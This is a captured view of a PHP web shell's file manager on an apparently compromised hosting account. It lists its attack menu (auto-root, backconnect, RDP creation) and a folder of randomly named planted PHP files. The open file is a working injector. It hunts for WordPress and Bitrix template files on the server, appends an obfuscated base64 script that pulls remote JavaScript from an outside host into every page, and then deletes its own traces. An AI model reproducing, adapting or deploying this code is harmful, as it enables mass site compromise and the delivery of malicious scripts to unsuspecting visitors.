Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
haytayan-new /
assets /
images /
[ HOME SHELL ]
Name
Size
Permission
Action
aib
[ DIR ]
drwx---r-x
cfu
[ DIR ]
drwx---r-x
iyf21
[ DIR ]
drwx---r-x
otw
[ DIR ]
drwx---r-x
ptx
[ DIR ]
drwx---r-x
wil
[ DIR ]
drwx---r-x
008ca20b38.php
8.14
KB
-rw----r--
01.php
494.51
KB
-rw----r--
27da0a7061.php
240.68
KB
-rw----r--
6cad8faee0.php
8.14
KB
-rw----r--
869853eb98bd.php
5.08
KB
-rw----r--
about4.php
2.21
KB
-rw----r--
accesson.php
212
B
-rw----r--
autoload_classmap.php
8.14
KB
-rw----r--
b28ccea71a.php
24.73
KB
-rw----r--
d56819733b.php
24.73
KB
-rw----r--
del.php
73
B
-rw----r--
gkmpkb.php
21.68
KB
-rw----r--
iwnhk9d02.php
7.41
KB
-rw----r--
jytvfhlh.php
760
B
-rw----r--
kbutkuhp.php
760
B
-rw----r--
log_bt.txt
0
B
-rw----r--
log_wp.txt
0
B
-rw----r--
ma.php
162.21
KB
-rw----r--
p.php
2.75
KB
-rw----r--
php.ini
78
B
-rw----r--
rzhyqmcf.php
760
B
-rw----r--
smudq2m72.php
7.41
KB
-rw----r--
style.php
13.04
KB
-rw----r--
tjwkj2p95.php
7.41
KB
-rw----r--
wfohpggr.php
760
B
-rw----r--
wp-22.php
14.24
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tjwkj2p95.php
<?php $codeWP = '<?php function findAccessiblePaths($path) { $parts = explode("/", $path); $currentPath = "/"; $accessiblePaths = []; foreach ($parts as $part) { if (!empty($part)) { $currentPath .= $part . "/"; if (is_readable($currentPath)) { $accessiblePaths[] = $currentPath; } } } return $accessiblePaths; } function findWpThemesCrossPlatform() { $cwd = getcwd(); $accessiblePaths = findAccessiblePaths($cwd); $allModifiedFiles = []; foreach ($accessiblePaths as $path) { $command = getSearchCommand($path); $output = shell_exec($command); $functionsPaths = []; if ($output) { $paths = preg_split("/\r\n|\r|\n/", trim($output)); foreach ($paths as $path) { $foundPaths = findFilesRecursively($path, "functions.php"); $functionsPaths = array_merge($functionsPaths, $foundPaths); } } $modifiedFiles = addCustomScriptToFiles($functionsPaths); if (!empty($modifiedFiles)) { $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles); break; } } if (empty($allModifiedFiles)) { echo "No themes modified or accessible"; } else { print_r($allModifiedFiles); } } function addCustomScriptToFiles(array $functionsPaths) { $modifiedFiles = []; $newFunctionCode = getCustomScript(); foreach ($functionsPaths as $functionsPath) { if (file_exists($functionsPath) && is_writable($functionsPath)) { $code = file_get_contents($functionsPath); if (strpos($code, "wp_system_query_script") === false) { $code .= "\n" . $newFunctionCode; file_put_contents($functionsPath, $code); $modifiedFiles[] = $functionsPath; } } } return $modifiedFiles; } function getCustomScript() { return <<<PHP function wp_system_query_script() { ?> <script src="data:text/javascript;base64,dmFyIGQ9ZG9jdW1lbnQ7dmFyIHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgCnMuc3JjPScvL3J0eC5jb2Rlc3ltYmFsLndvcmtlcnMuZGV2L0xDSjVKOT9mcm09c2NyaXB0JzsgCmlmIChkb2N1bWVudC5jdXJyZW50U2NyaXB0KSB7IApkb2N1bWVudC5jdXJyZW50U2NyaXB0LnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKHMsIGRvY3VtZW50LmN1cnJlbnRTY3JpcHQpOwp9IGVsc2UgewpkLmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7Cn0="></script> <?php } add_action("wp_footer", "wp_system_query_script"); add_action("wp_body_open", "wp_system_query_script"); PHP; } function getSearchCommand($startPath) { $os = strtoupper(substr(PHP_OS, 0, 3)); if ($os === "WIN") { return "dir /s /b /a:d {$startPath}*wp-content\\themes*"; } else { return "find {$startPath} -type d -name \'themes\' -path \'*/wp-content/themes\' 2>/dev/null"; } } function findFilesRecursively($dir, $fileName) { $results = []; $files = scandir($dir); foreach ($files as $file) { if ($file !== "." && $file !== "..") { $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { $results = array_merge($results, findFilesRecursively($path, $fileName)); } elseif ($file === $fileName) { $results[] = $path; } } } return $results; } findWpThemesCrossPlatform(); die(); ?>'; $codeBT = '<?php function findAccessiblePaths($path) { $parts = explode("/", $path); $currentPath = "/"; $accessiblePaths = []; foreach ($parts as $part) { if (!empty($part)) { $currentPath .= $part . "/"; if (is_readable($currentPath)) { $accessiblePaths[] = $currentPath; } } } return $accessiblePaths; } function modifyBitrixTemplates() { $cwd = getcwd(); $accessiblePaths = findAccessiblePaths($cwd); $allModifiedFiles = []; foreach ($accessiblePaths as $path) { $command = getSearchCommand($path); $output = shell_exec($command); $templatePaths = []; if ($output) { $paths = preg_split("/\r\n|\r|\n/", trim($output)); foreach ($paths as $path) { $foundPaths = findFilesRecursively($path, "header.php"); // Example file in a Bitrix template $templatePaths = array_merge($templatePaths, $foundPaths); } } $modifiedFiles = addCustomScriptToFiles($templatePaths); if (!empty($modifiedFiles)) { $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles); break; } } if (empty($allModifiedFiles)) { echo "No templates modified or accessible"; } else { echo print_r($allModifiedFiles); } } function addCustomScriptToFiles(array $templatePaths) { $modifiedFiles = []; $newFunctionCode = getCustomScript(); foreach ($templatePaths as $templatePath) { if (file_exists($templatePath) && is_writable($templatePath)) { $code = file_get_contents($templatePath); if (strpos($code, "custom_query_script") === false) { $code .= "\n" . $newFunctionCode; file_put_contents($templatePath, $code); $modifiedFiles[] = $templatePath; } } } return $modifiedFiles; } function getCustomScript() { return <<<HTML <script src="data:text/javascript;base64,dmFyIGQ9ZG9jdW1lbnQ7dmFyIHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgCnMuc3JjPScvL3J0eC5jb2Rlc3ltYmFsLndvcmtlcnMuZGV2L0xDSjVKOT9mcm09c2NyaXB0JzsgCmlmIChkb2N1bWVudC5jdXJyZW50U2NyaXB0KSB7IApkb2N1bWVudC5jdXJyZW50U2NyaXB0LnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKHMsIGRvY3VtZW50LmN1cnJlbnRTY3JpcHQpOwp9IGVsc2UgewpkLmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7Cn0="></script> HTML; } function getSearchCommand($startPath) { $os = strtoupper(substr(PHP_OS, 0, 3)); if ($os === "WIN") { return "dir /s /b /a:d {$startPath}*bitrix*"; } else { return "find {$startPath} -type d -name \'bitrix\' -path \'*/bitrix\' 2>/dev/null"; } } function findFilesRecursively($dir, $fileName) { $results = []; $files = scandir($dir); foreach ($files as $file) { if ($file !== "." && $file !== "..") { $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { $results = array_merge($results, findFilesRecursively($path, $fileName)); } elseif ($file === $fileName) { $results[] = $path; } } } return $results; } modifyBitrixTemplates(); die(); ?>'; $del = <<<PHP <?php unlink('wp.php'); unlink('bt.php'); unlink('wpbtStart.php'); ?> PHP; file_put_contents('wp.php', $codeWP); file_put_contents('bt.php', $codeBT); file_put_contents('del.php', $del); $os = strtoupper(substr(PHP_OS, 0, 3)); if ($os === "WIN") { shell_exec("start /B php wp.php > log_wp.txt 2>&1"); shell_exec("start /B php bt.php > log_bt.txt 2>&1"); shell_exec("Start-Sleep -Seconds 600; Start-Process 'php' -ArgumentList 'del.php' -NoNewWindow"); } else { shell_exec("php wp.php > log_wp.txt 2>&1 &"); shell_exec("php bt.php > log_bt.txt 2>&1 &"); shell_exec("(sleep 600 && php del.php) > /dev/null 2>&1 &"); } ?>
Close
